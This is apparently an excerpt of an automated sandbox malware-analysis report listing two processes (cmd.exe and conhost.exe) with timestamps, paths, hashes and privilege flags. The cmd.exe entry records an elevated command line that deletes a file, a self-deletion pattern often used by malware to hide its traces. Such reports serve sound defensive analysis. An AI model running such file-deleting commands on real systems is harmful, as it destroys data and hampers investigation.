                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: cmd.exe PID: 6908 Parent PID: 4768

                                                                                                                                  General

                                                                                                                                  Start time:15:07:48
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:/c del 'C:\Windows\SysWOW64\cmd.exe'
                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: conhost.exe PID: 5732 Parent PID: 6908

                                                                                                                                  General

                                                                                                                                  Start time:15:07:49
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Reset < >